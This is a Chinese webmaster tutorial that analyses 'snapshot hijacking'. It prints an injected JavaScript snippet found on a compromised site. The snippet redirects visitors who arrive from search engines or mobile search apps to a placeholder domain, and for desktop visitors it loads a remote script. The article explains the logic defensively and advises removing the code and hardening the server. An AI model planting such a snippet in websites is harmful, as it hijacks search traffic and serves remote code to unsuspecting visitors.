首页 > 文章资讯 > 站长教程 > 建站知识 > 快照劫持的原理与JS跳转的分析

快照劫持的原理与JS跳转的分析

时间：2023年12月24日

来源：网络

编辑：佚名

近日，查看网站快照时，发现从百度快照页点击过去后，都跳转到了一个体裁站，但是直接访问，没有任何跳转，打开页面发现有一个js文件被篡改了。代码如下：
复制代码
<script type="text/javascript">
var je1 = /(sogou|soso|baidu|google|youdao|yahoo|bing|sm|so|biso|gougou|ifeng|ivc|sooule|niuhu|biso|360)/g;
var gtABvrdzG2 = /(Sogousearch|sogousearch|SogouSearch|baiduboxapp|SogouMobileBrowser|iPhone OS)/g;
var $P3 = window["document"]['referrer'];
if (je1['test']($P3) || gtABvrdzG2['test'](navigator['userAgent'])) {
if ((navigator['userAgent']['match'](/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) {
setTimeout("tiaoZ('https://xxxx.com/m/')", 1 * 200)
} else {
window["document"]['write']('<script src="https://www.xxxx.com/bob.js"></script></div>') } } function tiaoZ(nDZp4) { window['location']['href'] = nDZp4 };
</script>
复制代码
此段代码显示，如果链接来源于第二行中字符串任何一个匹配，则跳转到 https://xxxx.com/。
因此，发生以上的现象，只需要找到该代码删除即可解决跳转。
不过，因为此段代码，是被渗透后，修改了的结果，最终的解决办法是要加强服务器的反渗透及安全防御，可以使用安全狗、360等安全软件进行环境监控及防御。

新闻资讯更多

猜你需要